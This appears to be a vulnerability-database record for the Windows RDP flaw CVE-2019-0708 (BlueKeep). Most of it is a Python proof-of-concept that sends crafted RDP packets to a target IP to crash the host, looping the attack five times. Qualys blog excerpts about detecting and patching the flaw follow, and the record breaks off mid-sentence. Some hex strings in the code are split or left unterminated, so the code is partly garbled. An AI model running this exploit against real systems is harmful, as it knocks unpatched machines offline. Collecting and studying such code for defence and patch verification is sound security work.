00\\x32\\x00\\x63\\x00\\x66\\x00\\x2d\\x00\\x00\\x31\\x00\\x62\\x00\\x32\\x00\\x64\\x00\\x61\\x00\\x42\\x42\\x42\\x42\\x07\\x00\\x01\\x00\\x00\\x00\\x56\\x02\\x00\\x00\\x50\\x01\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x04\\xc0\\x0c\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xc0\\x0c\\x00\\x1b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\xc0\\x38\\x00\\x04\\x00\\x00\\x00\\x72\\x
64\\x70\\x73\\x6e\\x64\\x00\\x00\\x0f\\x00\\x00\\xc0\\x63\\x6c\\x69\\x70\\x72\\x64\\x72\\x00\\x00\\x00\\xa0\\xc0\\x64\\x72\\x64\\x79\\x6e\\x76\\x63\\x00\\x00\\x00\\x80\\xc0\\x4d\\x53\\x5f\\x54\\x31\\x32\\x30\\x00\\x00\\x00\\x00\\x00\" \nsize0 = struct.pack(\">h\", len(p)) \nsize1 = struct.pack(\">h\", len(p)-12) \nsize2 = struct.pack(\">h\", len(p)-109) \nsize3 = struct.pack(\">h\", len(p)-118) \nsize4 = struct.pack(\">h\", len(p)-132) \nsize5 = struct.pack(\">h\", len(p)-390) \nba = bytearray() \nba.extend(map(ord, p)) \nba[2] = size0[0] \nba[3] = size0[1] \nba[10] = size1[0] \nba[11] = size1[1] \nba[107] = size2[0] \nba[108] = size2[1] \nba[116] = 0x81 \nba[117] = size3[1] \nba[130] = 0x81 \nba[131] = size4[1] \nba[392] = size5[1] \ntls.sendall(bytes(ba)) \ntls.recv(8192) \n \ndef send_client_info(tls): \np = b\"\\x03\\x00\\x01\\x61\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x81\\x52\\x40\\x00\\xa1\\xa5\\x09\\x04\\x09\\x04\\xbb\\x47\\x03\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x00\\x00\\x74\\x00\\x65\\x00\\x73\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x41\\x41\\x41\\x00\\x38\\x00\\x2e\\x00\\x32\\x00\\x33\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x40\\x00\\x43\\x00\\x3a\\x00\\x5c\\x00\\x57\\x00\\x49\\x00\\x4e\\x00\\x41\\x41\\x41\\x00\\x57\\x00\\x53\\x00\\x5c\\x00\\x73\\x00\\x79\\x00\\x73\\x00\\x74\\x00\\x65\\x00\\x6d\\x00\\x33\\x00\\x32\\x00\\x5c\\x00\\x6d\\x00\\x73\\x00\\x74\\x00\\x73\\x00\\x63\\x00\\x61\\x00\\x78\\x00\\x2e\\x00\\x64\\x00\\x6c\\x00\\x6c\\x00\\x00\\x00\\xa4\\x01\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0
0\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x44\\x00\\x61\\x00\\x79\\x00\\x6c\\x00\\x69\\x00\\x67\\x00\\x68\\x00\\x74\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc4\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\" \ntls.sendall(p) \n \ndef send_channel_packets(tls): \np1 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x04\\x01\\x00\\x01\\x00\" \ntls.sendall(p1) \np2 = b\"\\x03\\x00\\x00\\x08\\x02\\xf0\\x80\\x28\" \ntls.sendall(p2) \ntls.recv(1024) \np4 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xeb\" \ntls.sendall(p4) \ntls.recv(1024) \np5 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xec\" \ntls.sendall(p5) \ntls.recv(1024) \np6 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xed\" \ntls.sendall(p6) \ntls.recv(1024) \np7 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xee\" \ntls.sendall(p7) \ntls.recv(1024) \np8 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xef\" \ntls.sendall(p8) \ntls.recv(1024) \n \ndef send_confirm_active(tls, shareid): \np = 
\"\\x03\\x00\\x02\\x63\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x82\\x54\\x54\\x02\\x13\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\xea\\x03\\x06\\x00\\x3e\\x02\\x4d\\x53\\x54\\x53\\x43\\x00\\x17\\x00\\x00\\x00\\x01\\x00\\x18\\x00\\x01\\x00\\x03\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x1d\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x20\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x80\\x07\\x38\\x04\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x1a\\x01\\x00\\x00\\x00\\x03\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xaa\\x00\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x01\\x01\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\xa1\\x06\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x03\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x13\\x00\\x28\\x00\\x03\\x00\\x00\\x03\\x78\\x00\\x00\\x00\\x78\\x00\\x00\\x00\\xfc\\x09\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\\x08\\x00\\x06\\x00\\x00\\x00\\x07\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x08\\x00\\x0a\\x00\\x01\\x00\\x14\\x00\\x15\\x00\\x09\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x0d\\x00\\x58\\x00\\x91\\x00\\x20\\x00\\x09\\x04\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x34\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x10\\x00\\x
fe\\x00\\x20\\x00\\xfe\\x00\\x40\\x00\\xfe\\x00\\x80\\x00\\xfe\\x00\\x00\\x01\\x40\\x00\\x00\\x08\\x00\\x01\\x00\\x01\\x03\\x00\\x00\\x00\\x0f\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x28\\x64\\x00\\x14\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x15\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x0a\\x00\\x01\\x1a\\x00\\x08\\x00\\xaf\\x94\\x00\\x00\\x1c\\x00\\x0c\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1b\\x00\\x06\\x00\\x01\\x00\\x1e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x0b\\x00\\x02\\x00\\x00\\x00\\x03\\x0c\\x00\\x1d\\x00\\x5f\\x00\\x02\\xb9\\x1b\\x8d\\xca\\x0f\\x00\\x4f\\x15\\x58\\x9f\\xae\\x2d\\x1a\\x87\\xe2\\xd6\\x01\\x03\\x00\\x01\\x01\\x03\\xd4\\xcc\\x44\\x27\\x8a\\x9d\\x74\\x4e\\x80\\x3c\\x0e\\xcb\\xee\\xa1\\x9c\\x54\\x05\\x31\\x00\\x31\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x25\\x00\\x00\\x00\\xc0\\xcb\\x08\\x00\\x00\\x00\\x01\\x00\\xc1\\xcb\\x1d\\x00\\x00\\x00\\x01\\xc0\\xcf\\x02\\x00\\x08\\x00\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x01\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x04\" \nba = bytearray() \nba.extend(map(ord, p)) \ntls.sendall(bytes(ba)) \n \ndef send_establish_session(tls): \np = b\"\\x03\\x00\\x00\\x24\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x16\\x16\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x08\\x00\\x1f\\x00\\x00\\x00\\x01\\x00\\xea\\x03\" \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \ntls.sendall(p) \np = 
b\"\\x03\\x00\\x05\\x81\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x85\\x72\\x72\\x05\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xa3\\xce\\x20\\x35\\xdb\\x94\\xa5\\xe6\\x0d\\xa3\\x8c\\xfb\\x64\\xb7\\x63\\xca\\xe7\\x9a\\x84\\xc1\\x0d\\x67\\xb7\\x91\\x76\\x71\\x21\\xf9\\x67\\x96\\xc0\\xa2\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\x2b\\xe7\\xb0\\xd2\\xfd\\x81\\x90\\x1a\\x8f\\xd5\\x5e\\xee\\x5a\\x6d\\xcb\\xea\\x2f\\xa5\\x2b\\x06\\xe9\\x0b\\x0b\\xa6\\xad\\x01\\x2f\\x7a\\x0b\\x7c\\xff\\x89\\xd3\\xa3\\xe1\\xf8\\x00\\x96\\xa6\\x8d\\x9a\\x42\\xfc\\xab\\x14\\x05\\x8f\\x16\\xde\\xc8\\x05\\xba\\xa0\\xa8\\xed\\x30\\xd8\\x67\\x82\\xd7\\x9f\\x84\\xc3\\x38\\x27\\xda\\x61\\xe3\\xa8\\xc3\\x65\\xe6\\xec\\x0c\\xf6\\x36\\x24\\xb2\\x0b\\xa6\\x17\\x1f\\x46\\x30\\x16\\xc7\\x73\\x60\\x14\\xb5\\xf1\\x3a\\x3c\\x95\\x7d\\x7d\\x2f\\x74\\x7e\\x56\\xff\\x9c\\xe0\\x01\\x32\\x9d\\xf2\\xd9\\x35\\x5e\\x95\\x78\\x2f\\xd5\\x15\\x6c\\x18\\x34\\x0f\\x43\\xd7\\x2b\\x97\\xa9\\xb4\\x28\\xf4\\x73\\x6c\\x16\\xdb\\x43\\xd7\\xe5\\x58\\x0c\\x5a\\x03\\xe3\\x73\\x58\\xd7\\xd9\\x76\\xc2\\xfe\\x0b\\xd7\\xf4\\x12\\x43\\x1b\\x70\\x6d\\x74\\xc2\\x3d\\xf1\\x26\\x60\\x58\\x80\\x31\\x07\\x0e\\x85\\xa3\\x95\\xf8\\x93\\x76\\x99\\x9f\\xec\\xa0\\xd4\\x95\\x5b\\x05\\xfa\\x4f\\xdf\\x77\\x8a\\x7c\\x29\\x9f\\x0b\\x4f\\xa1\\xcb\\xfa\\x95\\x66\\xba\\x47\\xe3\\xb0\\x44\\xdf\\x83\\x03\\x44\\x24\\xf4\\x1e\\xf2\\xe5\\xcb\\xa9\\x53\\x04\\xc2\\x76\\xcb\\x4d\\xc6\\xc2\\xd4\\x3f\\xd3\\x8c\\xb3\\x7c\\xf3\\xaa\\xf3\\x93\\xfe\\x25\\xbd\\x32\\x7d\\x48\\x6e\\x93\\x96\\x68\\xe5\\x18\\x2b\\xea\\x84\\x25\\x69\\x02\\xa5\\x38\\x65\\x6f\\x0f\\x9f\\xf6\\xa1\\x3a\\x1d\\x22\\x9d\\x3f\\x6d\\xe0\\x4c\\xee\\x8b\\x24\\xf0\\xdc\\xff\\x70\\x52\\xa7\\x0d\\xf9\\x52\\x8a\\x1e\\x33\\x1a\\x30\\x11\\x15\\xd7\\xf8\\x95\\xa9\\xbb\\x74\\x25\\x8c\\xe3\\xe9\\x93\\x07\\x43\\xf5\\x50\\x60\\xf7\\x96\\x2e\\xd3\\xff\\
x63\\xe0\\xe3\\x24\\xf1\\x10\\x3d\\x8e\\x0f\\x56\\xbc\\x2e\\xb8\\x90\\x0c\\xfa\\x4b\\x96\\x68\\xfe\\x59\\x68\\x21\\xd0\\xff\\x52\\xfe\\x5c\\x7d\\x90\\xd4\\x39\\xbe\\x47\\x9d\\x8e\\x7a\\xaf\\x95\\x4f\\x10\\xea\\x7b\\x7a\\xd3\\xca\\x07\\x28\\x3e\\x4e\\x4b\\x81\\x0e\\xf1\\x5f\\x1f\\x8d\\xbe\\x06\\x40\\x27\\x2f\\x4a\\x03\\x80\\x32\\x67\\x54\\x2f\\x93\\xfd\\x25\\x5d\\x6d\\xa0\\xad\\x23\\x45\\x72\\xff\\xd1\\xeb\\x5b\\x51\\x75\\xa7\\x61\\xe0\\x3f\\xe4\\xef\\xf4\\x96\\xcd\\xa5\\x13\\x8a\\xe6\\x52\\x74\\x70\\xbf\\xc1\\xf9\\xfb\\x68\\x9e\\xdd\\x72\\x8f\\xb4\\x44\\x5f\\x3a\\xcb\\x75\\x2a\\x20\\xa6\\x69\\xd2\\x76\\xf9\\x57\\x46\\x2b\\x5b\\xda\\xba\\x0f\\x9b\\xe0\\x60\\xe1\\x8b\\x90\\x33\\x41\\x0a\\x2d\\xc5\\x06\\xfe\\xd0\\xf0\\xfc\\xde\\x35\\xd4\\x1e\\xaa\\x76\\x0b\\xae\\xf4\\xd5\\xbd\\xfa\\xf3\\x55\\xf5\\xc1\\x67\\x65\\x75\\x1c\\x1d\\x5e\\xe8\\x3a\\xfe\\x54\\x50\\x23\\x04\\xae\\x2e\\x71\\xc2\\x76\\x97\\xe6\\x39\\xc6\\xb2\\x25\\x87\\x92\\x63\\x52\\x61\\xd1\\x6c\\x07\\xc1\\x1c\\x00\\x30\\x0d\\xa7\\x2f\\x55\\xa3\\x4f\\x23\\xb2\\x39\\xc7\\x04\\x6c\\x97\\x15\\x7a\\xd7\\x24\\x33\\x91\\x28\\x06\\xa6\\xe7\\xc3\\x79\\x5c\\xae\\x7f\\x50\\x54\\xc2\\x38\\x1e\\x90\\x23\\x1d\\xd0\\xff\\x5a\\x56\\xd6\\x12\\x91\\xd2\\x96\\xde\\xcc\\x62\\xc8\\xee\\x9a\\x44\\x07\\xc1\\xec\\xf7\\xb6\\xd9\\x9c\\xfe\\x30\\x1c\\xdd\\xb3\\x3b\\x93\\x65\\x3c\\xb4\\x80\\xfb\\xe3\\x87\\xf0\\xee\\x42\\xd8\\xcf\\x08\\x98\\x4d\\xe7\\x6b\\x99\\x0a\\x43\\xed\\x13\\x72\\x90\\xa9\\x67\\xfd\\x3c\\x63\\x36\\xec\\x55\\xfa\\xf6\\x1f\\x35\\xe7\\x28\\xf3\\x87\\xa6\\xce\\x2e\\x34\\xaa\\x0d\\xb2\\xfe\\x17\\x18\\xa2\\x0c\\x4e\\x5f\\xf0\\xd1\\x98\\x62\\x4a\\x2e\\x0e\\xb0\\x8d\\xb1\\x7f\\x32\\x52\\x8e\\x87\\xc9\\x68\\x7c\\x0c\\xef\\xee\\x88\\xae\\x74\\x2a\\x33\\xff\\x4b\\x4d\\xc5\\xe5\\x18\\x38\\x74\\xc7\\x28\\x83\\xf7\\x72\\x87\\xfc\\x79\\xfb\\x3e\\xce\\xd0\\x51\\x13\\x2d\\x7c\\xb4\\x58\\xa2\\xe6\\x28\\x67\\x4f\\xec\\xa6\\x81\\x6c\\xf7\\x9a\\x29\\xa6\\x3b\\xca\\xec\\xb8\\xa1\\x27\\x50\\xb7\\xef\\xfc\\x81\\xbf\\x5d\\x86\\x20\\x94\\xc0\\
x1a\\x0c\\x41\\x50\\xa9\\x5e\\x10\\x4a\\x82\\xf1\\x74\\x1f\\x78\\x21\\xf5\\x70\\x61\\x24\\x00\\x3d\\x47\\x5f\\xf3\\x25\\x80\\x3c\\x4b\\xea\\xa3\\xf4\\x77\\xea\\xa1\\x42\\x1a\\x17\\x0f\\x6d\\xa8\\x35\\x9e\\x91\\x26\\x34\\x43\\x04\\xc6\\xc6\\x5b\\x21\\x7d\\x8c\\xc7\\x22\\x91\\x7b\\x2c\\x2d\\x2f\\xd6\\x7e\\xa5\\x52\\xa8\\x08\\x80\\xeb\\x60\\xd1\\x44\\x09\\x8e\\x3c\\xa1\\xaa\\x67\\x60\\x0a\\x26\\xc6\\xb5\\xc6\\x79\\xa6\\x4f\\x8b\\x8c\\x25\\x5c\\xf1\\x0b\\x23\\xf4\\xd8\\xa6\\x6d\\xf1\\x91\\x78\\xf9\\xe5\\x2a\\x50\\x2f\\x5a\\x44\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\xbf\\x28\\xae\\xd9\\xa2\\x98\\xa5\\xbc\\x60\\xca\\xb8\\x90\\x4d\\x20\\x46\\xd9\\x8a\\x1a\\x30\\x01\\x8b\\x38\\x63\\x1a\\x57\\x09\\x51\\x46\\x95\\x9b\\xd8\\x80\\x0c\\xb0\\x77\\x24\\xbf\\x2b\\xd3\\x57\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x56\\x92\\x38\\xed\\x6b \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x27\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x32\\x00\" \ntls.sendall(p) \n \ndef send_kill_packet(tls, arch): \nif arch == \"32\": \np = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nelif arch == \"64\": \np = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nelse: \nprint(\"Make the second arguement '32' or '64' without 
quotes\") \nsys.exit() \ntls.sendall(p) \n \ndef terminate_connection(tls): \np = b\"\\x03\\x00\\x00\\x09\\x02\\xf0\\x80\\x21\\x80\" \ntls.sendall(p) \n \ndef main(args): \ntls = send_init_packets(args[1]) \n \nsend_client_data(tls) \nprint(\"[+] ClientData Packet Sent\") \n \nsend_channel_packets(tls) \nprint(\"[+] ChannelJoin/ErectDomain/AttachUser Sent\") \n \nsend_client_info(tls) \nprint(\"[+] ClientInfo Packet Sent\") \n \ntls.recv(8192) \ntls.recv(8192) \n \nsend_confirm_active(tls, None) \nprint(\"[+] ConfirmActive Packet Sent\") \n \nsend_establish_session(tls) \nprint(\"[+] Session Established\") \n \nsend_kill_packet(tls, args[2]) \nterminate_connection(tls) \nprint(\"[+] Vuln Should Trigger\") \n \nif __name__ == '__main__': \nif len(sys.argv) != 3: \nprint(\"Usage: python poc.py 127.0.0.1 64\") \nsys.exit() \n \nelif sys.argv[2] == '32' or '64': \n# I've had to send the packets 5 times for hosts that havent \n# had a terminal session since their last reboot. I think \n# I know why but atm its just easier to send the exchange \n# 5 times and it'll crash eventually. Most of the time its \n# the first time though. \nfor _ in range(5): \nmain(sys.argv) \n \nelse: \nprint(\"Usage: python poc.py 127.0.0.1 64\") \nsys.exit() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153133/msrdp-dos.txt"}], "qualysblog": [{"lastseen": "2019-06-04T16:24:33", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "This month's Microsoft [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/14/may-2019-patch-tuesday-79-vulns-22-critical-rdp-rce-mds-attacks-adobe-vulns>) included a very high-risk vulnerability (CVE-2019-0708, aka BlueKeep) in Remote Desktop that impacts Windows XP, Windows 7, Server 2003, Server 2008, and Server 2008 R2. This vulnerability allows an unauthenticated attacker (or malware) to execute code on the vulnerable system. 
It is very likely that PoC code will be published soon, and this may result in a WannaCry-style attack.\n\nMicrosoft has not only released [patches](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) for Windows 7, Server 2008 & R2, but also has taken the extra step to issue [patches](<https://support.microsoft.com/en-gb/help/4500705/customer-guidance-for-cve-2019-0708>) for Windows XP and Server 2003. Patch now!\n\nUPDATE: [Network Level Authentication](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713\\(v=ws.11\\)>) (NLA) partially [mitigates](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) this vulnerability. QID 90788 (Microsoft Windows Network Level Authentication Disabled) can be used to find hosts that have NLA disabled. This forces the attacker to have valid credentials in order to perform RCE.\n\nUPDATE: A new remote (unauthenticated) check was released under QID 91541. See below for details.\n\n### Detecting CVE-2019-0708\n\nQualys has issued a special QID (91534) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that covers only CVE-2019-0708 across all impacted Operating Systems, including Windows XP and Server 2003. This QID is included in signature version VULNSIGS-2.4.606-3, and requires authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). Cloud Agents will automatically receive this new QID as part of manifest version 2.4.606.3-2.\n\n##### BlueKeep Unauthenticated check Update:\n\nQualys has also released a new unauthenticated check to address BlueKeep vulnerability:\n\nQID 91541 : Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (BlueKeep) (unauthenticated check)\n\nThis QID is included in vulnerability signature version VULNSIGS-2.4.620-x. 
A Scanner version update (11.2.35) is required to support this new QID. In certain edge cases involving CredSSP, for Windows 7 and above operating systems, this QID may not post as vulnerable if the service is not identified as RDP over port 3389. However, the authenticated check (QID 91534) will post the vulnerability for all affected Operating Systems.\n\nYou can search for all vulnerable systems in AssetView or within the VM Dashboard (Beta) by using the following QQL query:\n\n> vulnerabilities.vulnerability.cveIds:CVE-2019-0708\n\n### Tracking Impact and Remediation\n\nQualys is providing a downloadable AssetView Dashboard for tracking this vulnerability across your environment. Visit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download it now for importing into your subscription.\n\n### Remediating with Qualys Patch Management\n\nCustomers using [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Cloud Agent can search for cve:`CVE-2019-0708` in the Patch Catalog, and click \"Missing\" in the side panel to locate and deploy patches to all affected Operating Systems, including Windows XP and Server 2003.\n\nFor emergency patching, you can create an On-demand Job and target it at the \"Cloud Agent\" tag to cover all hosts. For continuous patching, a Daily Job can be created with a 24-hour \"Patch Window\" to ensure all hosts will continue to receive the required patches. This patch does require a reboot.\n\nTargeting specific operating systems is not necessary. 
The Qualys Cloud Agent already knows which patch is needed for each host.\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>).", "modified": "2019-05-16T02:17:00", "published": "2019-05-16T02:17:00", "id": "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch", "type": "qualysblog", "title": "Windows RDP Remote Code Execution Vulnerability (BlueKeep) \u2013 How to Detect and Patch", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T01:02:08", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "The BlueKeep vulnerability, initially released in May 2019, is currently being exploited in the wild. Cybersecurity researchers have spotted initial attacks exploiting the BlueKeep RDP vulnerability. Here's a reminder about BlueKeep and instructions for using Qualys to identify attacks and remediate this vulnerability.\n\n### About BlueKeep Attacks\n\nBlueKeep allows an unauthenticated attacker to connect to the target system using Microsoft's RDP protocol to execute code on the vulnerable system. It is a wormable remote code execution vulnerability, as it can propagate itself from one vulnerable computer to another without any victim interaction.\n\nRecently, BlueKeep exploitation activity was seen by security researcher Kevin Beaumont, who has been running a worldwide honeypot network named [BluePot to spot exploitation](<https://doublepulsar.com/bluekeep-exploitation-activity-seen-in-the-wild-bd6ee6e599a6>) activities. Fortunately, the attack code seen so far is not wormable. 
Later on, security researcher Marcus Hutchins analyzed these attacks and found that attackers are scanning the internet for unpatched Windows systems with RDP (port 3389) exposed to the internet.\n\nUnpatched systems with RDP ports open are at high risk, and immediate action should be taken to remediate the vulnerability.\n\n### Protecting from BlueKeep\n\nMicrosoft's [Patch Tuesday, May 2019](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/14/may-2019-patch-tuesday-79-vulns-22-critical-rdp-rce-mds-attacks-adobe-vulns>) included patches for [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) (aka the BlueKeep vulnerability).\n\nQualys released a blog post earlier on how to identify the BlueKeep vulnerability in your environment: \n[Windows RDP Remote Code Execution Vulnerability (BlueKeep) \u2013 How to Detect and 